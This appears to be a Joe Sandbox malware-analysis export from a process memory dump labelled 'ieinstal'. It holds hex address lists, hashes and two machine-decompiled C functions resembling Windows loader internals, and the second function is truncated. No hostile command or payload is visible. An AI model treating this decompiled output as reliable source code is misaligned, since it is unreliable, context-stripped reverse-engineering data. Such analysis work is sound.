0x1f02d1d4
0x1f02d1d4
0x00000000
0x1f02d1d2
0x1efe8f58
0x1efe8f5a
0x1efe8f5d
0x1efe8f61
0x1efe8f63
0x1efe8f63
0x1efe8f66
0x1efe8f69
0x00000000
0x00000000
0x1f02d1ec
0x1f02d1ef
0x1f02d226
0x1f02d22a
0x1f02d22b
0x1f02d234
0x00000000
0x1f02d1f1
0x1f02d201
0x1f02d203
0x1f02d205
0x00000000
0x00000000
0x1f02d20b
0x1f02d20d
0x1f02d20f
0x1f02d20f
0x1f02d20f
0x1f02d215
0x1f02d218
0x1f02d21b
0x1f02d21e
0x1f02d221
0x1f02d223
0x1f02d223
0x00000000
0x1f02d221
0x1efe8f74
0x1efe8f77
0x1efe8f79
0x1efe8f7e
0x1efe8f81
0x1efe8f85
0x1efe8e4e
0x1efe8e4e
0x1efe8e51
0x1efe8e51
0x1efe8e54
0x1efe8e56
0x1efe8ead
0x1efe8ead
0x1efe8eb0
0x1efe8eb2
0x1efe8f93
0x1efe8f95
0x1efe8f9a
0x1efe8f9d
0x1efe8fa1
0x00000000
0x00000000
0x1f02d2c7
0x1f02d2ca
0x1f02d2cd
0x1f02d2cd
0x1f02d2d0
0x1f02d2d4
0x1f02d2d9
0x1f02d2de
0x1f02d2e1
0x1f02d2e4
0x1f02d2e8
0x1f02d2ec
0x1f02d2ec
0x1f02d2ee
0x1f02d2f0
0x1f02d2f0
0x1f02d2f6
0x1f02d2f7
0x1f02d2f9
0x1f02d300
0x1f02d300
0x1f02d304
0x1f02d307
0x1f02d307
0x1efe8eb8
0x1efe8eb8
0x1efe8ebb
0x1efe8ebd
0x1efe8fac
0x1efe8fb0
0x1efe8fb3
0x1efe8fb6
0x1efe8fba
0x1efe8ff3
0x1f02d30e
0x1f02d30e
0x1f02d311
0x1f02d315
0x1f02d31a
0x1f02d31f
0x1f02d322
0x1f02d326
0x1f02d32a
0x1f02d32a
0x1f02d32c
0x1f02d32e
0x1f02d32e
0x1f02d334
0x1f02d335
0x1f02d337
0x1f02d33a
0x1f02d341
0x1f02d341
0x1f02d345
0x1f02d345
0x1efe8fbc
0x1efe8fbc
0x1efe8ec3
0x1efe8ec6
0x1efe8ec8
0x1efe8fc3
0x1efe8fc7
0x1efe8fc7
0x1efe8fca
0x1efe8fcd
0x1efe8fd1
0x00000000
0x00000000
0x1efe8fd7
0x1f02d34d
0x1f02d34d
0x1f02d350
0x1f02d354
0x1f02d359
0x1f02d35e
0x1f02d361
0x1f02d365
0x1f02d369
0x1f02d369
0x1f02d36b
0x1f02d36d
0x1f02d36d
0x1f02d373
0x1f02d374
0x1f02d376
0x1f02d379
0x1f02d380
0x1f02d380
0x1f02d384
0x1f02d384
0x1efe8ece
0x1efe8ece
0x1efe8ed1
0x1efe8ed3
0x1efe8fe1
0x1efe8fe4
0x1efe8fe8
0x00000000
0x00000000
0x1f02d38c
0x1f02d38f
0x1f02d38f
0x1f02d391
0x1f02d391
0x1f02d394
0x1f02d398
0x1f02d39d
0x1f02d3a2
0x1f02d3a5
0x1f02d3a9
0x1f02d3ad
0x1f02d3ad
0x1f02d3af
0x1f02d3b1
0x1f02d3b1
0x1f02d3b7
0x1f02d3b8
0x1f02d3ba
0x1f02d3bd
0x1f02d3c4
0x1f02d3c4
0x1f02d3c8
0x1f02d3c8
0x00000000
0x1efe8ed3
0x1efe8e5b
0x1efe8e5d
0x1efe8e62
0x1efe8e65
0x1efe8e69
0x00000000
0x00000000
0x1efe8e6b
0x1efe8e6e
0x1efe8e71
0x1efe8e71
0x1efe8e74
0x1efe8e78
0x1efe8e7d
0x1efe8e82
0x1efe8e85
0x1efe8e88
0x1efe8e8c
0x1efe8e90
0x1efe8e90
0x1efe8e92
0x1efe8e94
0x1efe8e94
0x1efe8e9a
0x1efe8e9b
0x1efe8e9d
0x1efe8ea4
0x1efe8ea4
0x1efe8ea8
0x1efe8eab
0x1efe8eab
0x00000000
0x1efe8eab
0x1f02d264
0x1f02d267
0x1f02d26a
0x1f02d26d
0x1f02d26d
0x1f02d26f
0x1f02d271
0x1f02d2a8
0x1f02d2a8
0x00000000
0x1f02d2a8
0x1f02d273
0x1f02d275
0x1f02d285
0x1f02d28c
0x1f02d291
0x1f02d294
0x1f02d297
0x1f02d29b
0x1f02d29f
0x1f02d2a1
0x1f02d2a3
0x00000000
0x1f02d2a3
0x1f02d277
0x1f02d279
0x00000000
0x00000000
0x1f02d27b
0x1f02d27d
0x00000000
0x00000000
0x1f02d281
0x1f02d283
0x00000000
0x00000000
0x00000000
0x1f02d2ac
0x1f02d2af
0x1f02d2b0
0x1f02d2b2
0x1f02d2b9
0x1f02d2b9
0x1f02d2bd
0x1f02d2c0
0x00000000
0x1f02d2c0
0x1efe8dcf
0x1efe8dd5
0x1efe8dd8
0x1efe8dde
0x1efe8de0
0x1efe8de2
0x00000000
0x00000000
0x1efe8deb
0x1efe8df0
0x1efe8df8
0x1efe8e06
0x1efe8e0b
0x1efe8e0e
0x1efe8e10
0x1f02d23b
0x00000000
0x1f02d23b
0x1efe8e22
0x1efe8e24
0x1efe8e27
0x1efe8e29
0x1f02d24a
0x1f02d257
0x1f02d25c
0x00000000
0x1f02d25c
0x1efe8e36
0x1efe8e3b
0x1efe8e3d
0x1f02d245
0x00000000
0x1f02d245
0x1efe8e43
0x1efe8e46
0x1efe8e48
0x00000000
0x00000000
0x00000000
0x1efe8e48
0x1efe8dc4
0x1efe8dc4
0x1efe8dc7
0x1efe8dc9
0x00000000
0x00000000
0x00000000
0x1efe8dc9
0x1efe8db9
0x1efe8db9
0x1efe8dbc
0x1efe8dbe
0x00000000
0x00000000
0x00000000
0x1efe8dbe
0x1efe8f0f
0x1efe8dae
0x1efe8dae
0x1efe8db1
0x1efe8db3
0x00000000
0x00000000
0x00000000
0x1efe8db3
0x1efe8d48
0x1efe8d48
0x1efe8d4b
0x1efe8d4f
0x1efe8d51
0x1efe8d51
0x1efe8d54
0x1efe8d57
0x00000000
0x00000000
0x1efe8d59
0x1efe8d5c
0x1efe8d94
0x1efe8d98
0x1efe8d99
0x1efe8d9f
0x00000000
0x1efe8d9f
0x1efe8d6e
0x1efe8d70
0x1efe8d72
0x00000000
0x00000000
0x1efe8d78
0x1efe8d7a
0x1efe8d7c
0x1efe8d7c
0x1efe8d7c
0x1efe8d7f
0x1efe8d82
0x1efe8d85
0x1efe8d88
0x1efe8d8b
0x1efe8d8e
0x1f02d0f1
0x1f02d0f1
0x00000000
0x1efe8d8e
0x00000000
0x1efe8d22
0x1efe8d25
0x00000000
0x1efe8d27

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5ebb1e2d84f3bfb6834b3790a766b3b661c317d9b2c49213987ed4f1a42ee
Instruction ID: c32ebde05e61be789313dc62f8a1f2caed342d855b6896c73b4422599ed21379
Opcode Fuzzy Hash: 54c5ebb1e2d84f3bfb6834b3790a766b3b661c317d9b2c49213987ed4f1a42ee
Instruction Fuzzy Hash: 85225070E0029ADBCB18DF95C5A0AAEFBF6BF44300F59815AEC45AB641E734ED41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEEE48 Relevance: .3, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1EFEEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x1f09c610);
				E1F017C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L1EFD2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E1EFD24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1f0b67f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x1f0b67f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x1f0b67f0; // 0x0
							_t309 =  *0x1f0b67f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x333c1c8
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E1EFEF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x1f0b91e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x33443fc
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E1EFD24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L1EFD2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L1EFD2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E1EFD24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L1EFD2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x33443fc
										E1F04C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x33443fc
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x33443fc
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E1EFEF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x333c1c8
									_t86 = _t255 + 0x10; // 0x33443fc
									 *0x1f0b91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x1f0b91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x1f0b91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E1EFD3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x33443fc
										_t250 = E1F04C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E1EFEF1DB(_t250);
									_t228 = E1EFEF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x33443fc
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x1efeee48
0x1efeee4a
0x1efeee4f
0x1efeee54
0x1efeee56
0x1efeee5b
0x1efeee60
0x1efeee63
0x1efeee66
0x1efeee68
0x1efeee70
0x1efeee73
0x1efeee76
0x1efeee79
0x1efeee80
0x1efeee85
0x1efeee88
0x00000000
0x1efeee8b
0x1efeee93
0x1efeee98
0x1efeee9f
0x1efeeeac
0x1efeeeb8
0x1efeeeb8
0x1efeeebe
0x1efeeec6
0x1efeeec9
0x1efeeec9
0x1efeeece
0x1efeeece
0x1efeeece
0x1efeeece
0x1efeeece
0x1efeeece
0x1efeeed3
0x1efeeed6
0x1efeeedb
0x1efeeee0
0x1efeeee6
0x1efeeeee
0x1efeeeee
0x1efeeef0
0x1efeeef4
0x1efeeef6
0x00000000
0x00000000
0x1efef1dc
0x1efef1dc
0x1efeeefc
0x1efeeefc
0x1efeef01
0x1efeef03
0x1efeef06
0x1efeef09
0x1efeef0c
0x1efeef0f
0x1efeef0f
0x1efeef16
0x1efeef16
0x1efeef1b
0x1efeef20
0x1efeef26
0x1efeef29
0x1efeef2c
0x1efeef2c
0x1efeef36
0x1efeef36
0x1efeef3b
0x1efeef40
0x1efeef46
0x1efeef4c
0x1efeef54
0x1efeef57
0x1efeef59
0x1efeef60
0x1efeef63
0x1efeef63
0x1efeef66
0x1efeef69
0x1efeef6c
0x1efef113
0x1efef113
0x1efef115
0x1efef122
0x1efef127
0x1efef12b
0x1f02fe64
0x1f02fe6a
0x1f02fe6a
0x00000000
0x1efef12b
0x1efeef72
0x1efeef74
0x00000000
0x00000000
0x1efeef7a
0x1efeef7d
0x1efeef7d
0x1efeef7d
0x1efeef81
0x1efef144
0x1efef144
0x1efef14a
0x1f02fd20
0x1f02fd23
0x1efeef90
0x1efeef90
0x1efeef93
0x1f02fd2e
0x1f02fd31
0x00000000
0x00000000
0x1f02fd37
0x1f02fd45
0x1f02fd4b
0x1f02fd4b
0x1f02fd4e
0x00000000
0x00000000
0x00000000
0x1f02fd54
0x1f02fd3c
0x1f02fd3f
0x00000000
0x00000000
0x00000000
0x1f02fd3f
0x1efeef99
0x1efeef99
0x1efeef9c
0x1efef1a6
0x1efef1a9
0x00000000
0x00000000
0x00000000
0x1efef1af
0x1efeefa2
0x1efeefa2
0x1efeefa5
0x1efeefab
0x1efeefae
0x1efeefb4
0x1efeefba
0x1efeefc0
0x1efeefc6
0x1efeefcc
0x1efeefd8
0x1efeefde
0x1efeefe1
0x1efeefe7
0x1efeefe9
0x1efeefec
0x1efeeff3
0x1efeeff8
0x1efeeffa
0x1efeefff
0x1efef002
0x1efef008
0x1efef00a
0x1efef15d
0x1efef164
0x1efef165
0x1efef168
0x1efef16b
0x1efef16e
0x1efef170
0x00000000
0x00000000
0x1efef176
0x1efef17a
0x1efef1c8
0x1efef1cf
0x1efef1d0
0x1efef1d3
0x00000000
0x1efef1d3
0x1efef17c
0x1efef105
0x1efef105
0x1efef108
0x1efef10a
0x1efef1b7
0x1efef1b7
0x1efef110
0x00000000
0x1efef110
0x1efef010
0x1efef010
0x1efef013
0x1efef0a2
0x1efef0a2
0x1efef0a6
0x1efef186
0x1efef186
0x1efef0ac
0x1efef0b0
0x1f02fe56
0x1f02fe56
0x1efef103
0x1efef103
0x00000000
0x1efef103
0x1efef0bc
0x1efef0c3
0x1efef0c4
0x1efef0c7
0x1efef0ce
0x1f02fe35
0x1f02fe35
0x1f02fe39
0x00000000
0x00000000
0x1f02fe41
0x1f02fe41
0x1f02fe42
0x1f02fe48
0x1f02fe51
0x00000000
0x1f02fe51
0x1efef0d4
0x1efef0db
0x00000000
0x00000000
0x1efef0e1
0x1efef0e5
0x1efef193
0x1efef199
0x1efef19b
0x00000000
0x00000000
0x1efef0f4
0x1efef0f4
0x1efef0f8
0x1efef0fa
0x1efef0fd
0x1f02fe1e
0x1f02fe21
0x1f02fe24
0x1f02fe27
0x1f02fe2a
0x1f02fe2d
0x1f02fe2d
0x1efef0fd
0x00000000
0x1efef0f8
0x1efef0eb
0x1efef0ee
0x1efef0f1
0x00000000
0x1efef0f1
0x1efef01c
0x1efef01f
0x1efef02a
0x1efef02d
0x1efef030
0x1efef034
0x1efef036
0x1efef039
0x1efef045
0x1efef051
0x1efef05a
0x1efef05a
0x1efef05d
0x1efef060
0x1efef062
0x1f02fd59
0x1f02fd5c
0x00000000
0x00000000
0x1f02fd62
0x1f02fd66
0x1f02fd72
0x1f02fd84
0x1f02fd8a
0x1f02fd8d
0x1f02fd90
0x00000000
0x1f02fd90
0x1f02fd68
0x1f02fd6c
0x00000000
0x00000000
0x00000000
0x1efef068
0x1efef068
0x1efef068
0x1efef06d
0x1f02fd98
0x1f02fda8
0x1f02fdae
0x1f02fdae
0x1efef073
0x1efef078
0x1efef07a
0x1f02fdbf
0x1efef080
0x1efef080
0x1efef080
0x1efef085
0x1efef088
0x1f02fde1
0x1f02fde4
0x1f02fde4
0x1efef08e
0x1efef095
0x1efef09d
0x00000000
0x1efef09d
0x1efef062
0x1f02fd29
0x1efef150
0x1efef153
0x00000000
0x00000000
0x00000000
0x1efef155
0x1efeef87
0x1efeef8a
0x1efef136
0x1efef13c
0x1efef13e
0x00000000
0x00000000
0x00000000
0x1efef13e
0x00000000
0x1efeef8a

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1824103305acee439771f4093ad7cd12b33c1d6ef498284a12b15eb2d1f9208c
Instruction ID: 39de4da81bbc21502997459777adda7386331b533dd25e5bc2a4343957c80e06
Opcode Fuzzy Hash: 1824103305acee439771f4093ad7cd12b33c1d6ef498284a12b15eb2d1f9208c
Instruction Fuzzy Hash: 85E11676E00748CFCB25CFA9D990A9DBBF2FF48310F11466AE946A7624D735A881CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFDCF00 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E1EFDCF00(void* __ecx, signed int __edx, signed int _a4, signed short* _a8, signed int _a12, signed int* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v140;
				char _v165;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v181;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int* _v220;
				char _v224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t118;
				signed int _t122;
				void* _t124;
				signed int _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				signed int _t143;
				intOrPtr _t146;
				signed int _t147;
				signed char _t154;
				intOrPtr _t156;
				intOrPtr _t160;
				void* _t165;
				signed int _t167;
				signed int _t168;
				void* _t169;
				signed int _t170;
				signed int _t174;
				void* _t175;
				void* _t176;
				signed short _t177;
				unsigned int _t181;
				signed char _t187;
				signed char _t189;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t213;
				void* _t215;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed short* _t223;
				signed int _t225;
				void* _t226;
				signed int _t228;
				void* _t230;
				signed int _t231;

				_t211 = __edx;
				_t176 = __ecx;
				_v8 =  *0x1f0bb370 ^ _t231;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_v208 = _a12;
				_t223 = _a8;
				_v220 = _a16;
				_v196 = _a24;
				_v180 = 0;
				_v165 = 0;
				if( *_t2 == 0) {
					L2:
					_v200 = 9;
				} else {
					_t165 = E1EFE2180(0x1f0b32d8);
					_v200 = 6;
					if(_t165 == 0) {
						goto L2;
					}
				}
				if(_t223 == 0) {
					_t118 = 0;
					__eflags = 0;
					_v172 = 0;
					L13:
					_t167 = _a4;
					_t224 = _v188;
					_v212 = _t118;
					while(1) {
						_t218 = 0;
						_t177 = 0x1000;
						_v176 = 0;
						__eflags = _t167;
						if(_t167 == 0) {
							break;
						}
						__eflags = _t167 -  *0x1f0b5d6c; // 0x77130000
						if(__eflags != 0) {
							L1EFD2330(_t118, 0x1f0b6668);
							_t187 =  *0x1f0b67a8; // 0x3332e88
							_t130 =  *0x1f0b67a4; // 0x33358d0
							__eflags = _t187 & 0x00000001;
							if((_t187 & 0x00000001) != 0) {
								__eflags = _t130;
